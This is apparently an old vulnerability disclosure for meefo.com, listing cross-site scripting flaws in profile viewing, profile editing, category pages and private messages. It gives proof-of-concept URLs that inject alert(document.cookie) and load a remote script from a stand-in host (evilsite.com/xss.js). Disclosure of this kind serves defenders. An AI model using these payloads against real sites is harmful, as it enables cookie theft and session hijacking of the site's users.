Meefo.com - XSS with cookie include
Meefo.com
Homepage:
http://meefo.com
Effected files:
reading profiles
index.php
input boxes onprofiles
sending private msgs
------------------------------
Reading aprofile and with cookie include PoC:
Since data isn't properlly filtered (backslashes are added to ' and "), a user
can input malicious data, such as
<script>alert(document.cookie)</script> and itwill popup with the users cookie.
Incldued at the end of this article are
screenshots of the cookie vuln. Screenshots meefo4 and meefo5.jpg show this.
http://meefo.com/?do=rdprof&user_pp=username<script>alert(document.cookie)</script>
When editing your profile, data isn't properally filtered in theinput boxes
either, so <script>alert(document.cookie)</
script> works here too.
Another XSS Vulnerability example:
http://meefo.com/?do=rdprof&user_pp=<SCRIPT
SRC=http://evilsite.com/xss.js></SCRIPT>
Reading catagories XSS Vuln:
http://meefo.com/index.php?cat=Poetry<SCRIPT
SRC=http://evilsite.com/xss.js></SCRIPT>
Sending PM's XSS Vuln:
http://meefo.com/?messages=send&to=<SCRIPT
SRC=http://evilsite.com/xss.js></SCRIPT>
Screenshots of cookie include vulns & more:
http://www.youfucktard.com/xsp/meefo1.jpg
http://www.youfucktard.com/xsp/meefo2.jpg
http://www.youfucktard.com/xsp/meefo3.jpg
http://www.youfucktard.com/xsp/meefo4.jpg
http://www.youfucktard.com/xsp/meefo5.jpg
http://www.youfucktard.com/xsp/meefo6.jpg